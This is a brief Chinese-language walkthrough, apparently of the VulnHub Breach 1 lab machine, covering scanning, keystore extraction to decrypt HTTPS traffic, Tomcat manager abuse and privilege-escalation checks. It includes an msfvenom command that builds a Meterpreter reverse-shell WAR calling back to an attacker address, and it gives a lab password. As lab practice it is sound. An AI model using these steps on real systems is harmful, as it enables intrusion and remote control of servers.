靶场环境
https://www.vulnhub.com/
配置靶机网络
工具准备
准备一个kali
burpsuite
wireshark
CTF编码工具
kali反弹 192.168.110.128
breach1 192.168.110.140
kali攻击 192.168.202.129
端口扫描信息收集
nmap -T4 -A -v 192.168.110.140
得到这么多端口,猜测可能是添加了一些安全产品
思路:按照常用的端口为80,打开网站看看
思路:翻译看看
思路:保存图片到本地,打开stu.baidu.com查看这张图的来源
思路:查看一下源码
思路:想想编码的特征
思路:猜测这个很可能是用户名和密码
看到鼠标一接近那个图片就会变成手的形状,可以点点看
思路:使用目录扫描dirb
没有什么发现
指纹识别
-
Wappalyzer安装插件
- whatweb
- msf
全部尝试一下,发现都不成功
CMS后台信息收集
这是一个密钥库的文件
解密HTTPS流量
HTTP的端口为8443
补充:使用keytool.exe生成一个密钥库
查看密钥库的内容
生成证书
提取证书
keytool -importkeystore -srckeystore D:\vulnhub\2-breach1\keystore -destkeystore D:\vulnhub\2-breach1\tomcat.p12 -deststoretype PKCS12 -srcalias tomcat
新版本为TLS
过滤查看一下数据包
ip.src ==192.168.110.140 || ip.dst == 192.168.110.140 and http
获取的证书是不安全,服务器不接受
Tomcat后台利用
利用Kali-129生成木马
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war
点击/kali
迅速放包
Linux提权
1,搜索漏洞
2,find ; ls -a
3,history
4,sudo -l
5,uname -a
没有什么,乖乖的从头开始
尝试登录
密码为coffeestains
